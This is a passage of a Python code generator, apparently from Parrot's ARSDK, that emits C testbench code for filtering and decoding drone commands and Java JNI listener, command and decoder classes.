cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' // Change filter status\n')
cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ');\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to blocked : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n')
cfile.write (' }\n')
cfile.write (' // Default block, set to allow after\n')
cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', &filterError);\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating block filter : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' // Change filter status\n')
cfile.write (' filterError = setter (testFilter, ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ');\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while setting filter state to allowed : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while filtering : expected status %d / error %d, got status %d, error %d !", ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ', filterStatus, filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (&testFilter);\n')
cfile.write (' }\n')
cfile.write (' return errors;\n')
cfile.write ('}\n')
cfile.write ('\n')
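    # autoTest: for every command, generate it with sample arguments, describe it,
    # run the filter test and decode it back through the matching callback.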
cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ()\n')
cfile.write ('{\n')
cfile.write (' int32_t buffSize = 128;\n')
cfile.write (' uint8_t *buffer = malloc (buffSize * sizeof (uint8_t));\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' res = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n')
cfile.write (' int32_t resSize = 0;\n')
cfile.write (' errcount = 0;\n')
cfile.write (' ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' ();\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
cfile.write (' res = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (buffer, buffSize, &resSize')
for arg in cmd.args:
cfile.write (', ' + xmlToSample (ftr, cmd, arg))
cfile.write (');\n')
cfile.write (' if (res != ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + '\\n\\n");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
            cfile.write ('        ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Generating command ' + ARCapitalize (get_ftr_old_name(ftr)) + '.' + cmdNamePrint + ' succeeded");\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err;\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (buffer, resSize, describeBuffer, 1024);\n')
cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while describing buffer: %d", err);\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "%s", describeBuffer);\n')
cfile.write (' }\n')
cfile.write (' errcount += ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (buffer, resSize, ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior);\n')
cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 1;\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (buffer, resSize);\n')
cfile.write (' ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Decode return value : %d\\n\\n", err);\n')
cfile.write (' if (err != ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write (' if (errcount == 0)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "No errors !");\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "%d errors detected during autoTest", errcount);\n')
cfile.write (' }\n')
cfile.write (' if (buffer != NULL)\n')
cfile.write (' {\n')
cfile.write (' free (buffer);\n')
cfile.write (' }\n')
cfile.write (' return errcount;\n')
cfile.write ('}\n')
cfile.close ()
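    # Testbench header: only exposes the autoTest entry point.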
hfile = open (paths.TB_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('#ifndef ' + TB_DEFINE + '\n')
hfile.write ('#define ' + TB_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + TB_DEFINE + ' */\n')
hfile.close ()
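    # Linux testbench executable: a main() that simply runs the autoTest.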
cfile = open (paths.TB_LIN_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include "' + TB_HFILE_NAME + '"\n')
cfile.write ('\n')
cfile.write ('int main (int argc, char *argv[])\n')
cfile.write ('{\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'autoTest') + ' ();\n')
cfile.write ('}\n')
cfile.close ()
def java_generateCmds(ctx, paths):
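    # Generates the JNI Java classes: one listener interface per command, the command
    # class, the decoder, the filter and the Java copies of the C enums.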
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.JNI_DIR):
os.makedirs (paths.JNI_DIR)
if not os.path.exists (paths.JNIJ_OUT_DIR):
os.makedirs (paths.JNIJ_OUT_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 12TH PART : #
#################################
# Generate JNI C/Java code #
#################################
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile = open (paths.JNIJ_OUT_DIR + interfaceName (ftr, cmd) + '.java', 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Interface for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> listener\n')
jfile.write (' * @author Parrot (c) 2013\n')
jfile.write (' */\n')
jfile.write ('public interface ' + interfaceName (ftr, cmd) + ' {\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Called when a command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code> is decoded\n')
for arg in cmd.args:
                jfile.write ('     * @param ' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
jfile.write (' */\n')
jfile.write (' void ' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (');\n')
jfile.write ('}\n')
jfile.close ()
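    # Main command class: wraps a native buffer and exposes one setter per command,
    # plus the deprecated decode/listener helpers.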
jfile = open (paths.JNI_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('import ' + SDK_PACKAGE_ROOT + 'arsal.ARNativeData;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java representation of a C ' + JNIClassName + ' object.<br>\n')
    jfile.write (' * This class holds either app-generated objects that are to be sent\n')
    jfile.write (' * to the device, or network-generated objects that are to be decoded by\n')
jfile.write (' * the application.\n')
jfile.write (' * @author Parrot (c) 2013\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIClassName + ' extends ARNativeData {\n')
jfile.write ('\n')
jfile.write (' public static final int ' + ARMacroName (LIB_MODULE, JNIClassName, 'HEADER_SIZE') + ' = 4;\n')
jfile.write (' public static final boolean ' + ARMacroName (LIB_MODULE, JNIClassName, 'HAS_DEBUG_COMMANDS') + ' = ')
if genDebug:
jfile.write ('true;\n')
else:
jfile.write ('false;\n')
jfile.write (' private static final ' + JNIDecoderClassName + ' _decoder = new '+JNIDecoderClassName+'();\n')
jfile.write ('\n')
# Generate bit field flags
for ftr in allFeatures:
oldEnumValFrm = False if ftr.classes == None else True
for enum in ftr.enums:
if enum.usedLikeBitfield:
for eVal in enum.values:
jfile.write (' public static final int ' + ARFlagValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name) + ' = (1 << '+ARJavaEnumValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ '.getValue()); ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new, empty ' + JNIClassName + ' with the default size.<br>\n')
jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' () {\n')
jfile.write (' super ();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write (' /**\n')
    jfile.write ('     * Creates a new, empty ' + JNIClassName + ' with a user-specified size.<br>\n')
jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param capacity user specified capacity of the command buffer\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (int capacity) {\n')
jfile.write (' super (capacity);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData instance.<br>\n')
jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param oldData ARNativeData which contains original data\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData) {\n')
jfile.write (' super (oldData);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from a c pointer and size.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param data The original data buffer to copy\n')
jfile.write (' * @param dataSize The original data buffer size\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (long data, int dataSize) {\n')
jfile.write (' super (data, dataSize);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData, with a given minimum capacity.<br>\n')
jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param oldData ARNativeData which contains original data\n')
jfile.write (' * @param capacity Minimum capacity of this object\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData, int capacity) {\n')
jfile.write (' super (oldData, capacity);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Describe a ' + JNIClassName + '.<br>\n')
jfile.write (' * @return A String describing the ' + JNIClassName + ', with arguments values included\n')
jfile.write (' */\n')
jfile.write (' public String toString () {\n')
jfile.write (' return nativeToString (pointer, used);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Try to describe an ARNativeData as if it was an ' + JNIClassName + '.<br>\n')
jfile.write (' * @return A String describing the ARNativeData, if possible as an ' + JNIClassName + '.\n')
jfile.write (' */\n')
jfile.write (' public static String arNativeDataToARCommandString (ARNativeData data) {\n')
jfile.write (' if (data == null) { return "null"; }\n')
jfile.write (' String ret = nativeStaticToString(data.getData(), data.getDataSize());\n')
jfile.write (' if (ret == null) { ret = data.toString(); }\n')
jfile.write (' return ret;\n');
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * @deprecated\n')
jfile.write (' * Decodes the current ' + JNIClassName + ', calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode () {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' return _decoder.decode (this);\n')
jfile.write (' }\n')
jfile.write ('\n')
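    # One set method per command: fills the native buffer through the matching nativeSet call.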
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' /**\n')
jfile.write (' * Set an ' + JNIClassName + ' to hold the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
jfile.write (' * <br>\n')
jfile.write (' * Feature ' + ARCapitalize (get_ftr_old_name(ftr)) + ' description:<br>\n')
jfile.write (' * ' + ftr.doc.replace('\n', '\\n') + '<br>\n')
jfile.write (' * <br>\n')
if cmd.cls:
jfile.write (' * Class ' + ARCapitalize (cmd.cls.name) + ' description:<br>\n')
jfile.write (' * ' + cmd.cls.doc.replace('\n', '\\n') + '<br>\n')
jfile.write (' * <br>\n')
jfile.write (' * Command ' + ARCapitalize (cmd.name) + ' description:<br>\n')
if cmd.isDeprecated:
jfile.write (' * @deprecated\n')
jfile.write (' * ' + cmd.doc.desc.replace('\n', '<br>\n * ') + '<br>\n')
jfile.write (' * <br>\n')
jfile.write (' * This function reuses the current ' + JNIClassName + ', replacing its content with a\n')
jfile.write (' * new command created from the current params\n')
for arg in cmd.args:
jfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
#If the argument is a bitfield
if isinstance(arg.argType, ArBitfield):
jfile.write (' * @param _' + arg.name + ' a combination of')
#find the feature owning the enum
for bitFieldFtr in allFeatures:
for enum2 in bitFieldFtr.enums:
if enum2 == arg.argType.enum:
break;
else:
continue
break
for eVal in arg.argType.enum.values:
jfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name))
jfile.write ('\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' error code.\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name)
jfile.write (') {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (pointer, capacity')
for arg in cmd.args:
if isinstance(arg.argType, ArEnum):
jfile.write (', _' + arg.name + '.getValue()')
elif isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet()')
for multiset_msg_arg in multiset_msg.args:
jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'()')
else:
jfile.write (', _' + arg.name)
jfile.write (');\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' /**\n')
jfile.write (' * @deprecated\n')
jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
jfile.write (' * Listeners are static to the class, and are not to be set on every object\n')
jfile.write (' * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n')
jfile.write (' */\n')
jfile.write (' public static void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n')
jfile.write (' _decoder.set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener(' + interfaceVar (ftr, cmd) + '_PARAM);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write (' private native String nativeToString (long jpdata, int jdataSize);\n')
jfile.write (' private static native String nativeStaticToString (long jpdata, int jdataSize);\n')
jfile.write ('\n')
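    # Native declarations, one per command setter above.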
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private native int nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (long pdata, int dataTotalLength')
for arg in cmd.args:
if isinstance (arg.argType, ArEnum):
jfile.write (', int ' + arg.name)
elif isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
jfile.write (', int '+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet')
for multiset_msg_arg in multiset_msg.args:
jfile.write (', ' + xmlToJava (LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' '+ARUncapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'')
else:
jfile.write (', ' + xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (');\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.close ()
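    # Decoder class: wraps a native decoder and dispatches decoded commands to the registered listeners.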
jfile = open (paths.JNI_DECODER_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java representation of a C ' + JNIDecoderClassName + ' object.<br>\n')
    jfile.write (' * This class allows decoding of ARCommands.\n')
jfile.write (' * @author Parrot (c) 2016\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIDecoderClassName + ' {\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Storage of the C Pointer\n')
jfile.write (' */\n')
jfile.write (' protected long pointer;\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Check validity before all native calls\n')
jfile.write (' */\n')
jfile.write (' protected boolean valid;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Dummy throwable to keep the constructors call stack\n')
jfile.write (' */\n')
jfile.write ('\n')
jfile.write (' private Throwable constructorCallStack;\n')
jfile.write ('\n')
jfile.write (' protected static final String TAG = "'+JNIDecoderClassName+'";\n')
jfile.write ('\n')
jfile.write (' private static native void nativeStaticInit ();\n')
jfile.write (' static\n')
jfile.write (' {\n')
jfile.write (' nativeStaticInit();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
    jfile.write ('     * Creates a new ' + JNIDecoderClassName + '\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIDecoderClassName + ' () {\n')
jfile.write ('\n')
jfile.write (' this.pointer = nativeNewDecoder ();\n')
jfile.write (' this.valid = false;\n')
jfile.write (' if (this.pointer != 0) {\n')
jfile.write (' this.valid = true;\n')
jfile.write (' }\n')
jfile.write (' this.constructorCallStack = new Throwable();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* ********** */\n')
jfile.write (' /* DESTRUCTOR */\n')
jfile.write (' /* ********** */\n')
jfile.write (' protected void finalize () throws Throwable {\n')
jfile.write (' try {\n')
jfile.write (' if (valid) {\n')
jfile.write (' ARSALPrint.w (TAG, this + ": Finalize error -> dispose () was not called !", this.constructorCallStack);\n')
jfile.write (' dispose ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write (' finally {\n')
jfile.write (' super.finalize ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* ************** */\n')
jfile.write (' /* IMPLEMENTATION */\n')
jfile.write (' /* ************** */\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Checks the object validity\n')
jfile.write (' * @return <code>true</code> if the object is valid (buffer properly alloc and usable)<br><code>false</code> if the object is invalid (alloc error, disposed object)\n')
jfile.write (' */\n')
jfile.write (' public boolean isValid () {\n')
jfile.write (' return valid;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
    jfile.write ('     * Marks the native decoder as unused (so C-allocated memory can be freed)<br>\n')
    jfile.write ('     * A disposed decoder is marked as invalid\n')
jfile.write (' */\n')
jfile.write (' public void dispose () {\n')
jfile.write (' if (valid)\n')
jfile.write (' nativeDeleteDecoder (pointer);\n')
jfile.write (' this.valid = false;\n')
jfile.write (' this.pointer = 0;\n')
jfile.write (' }\n')
jfile.write (' /**\n')
jfile.write (' * Decodes a ' + JNIClassName + ', calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @param command command to decode.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode ('+JNIClassName+' command) {\n')
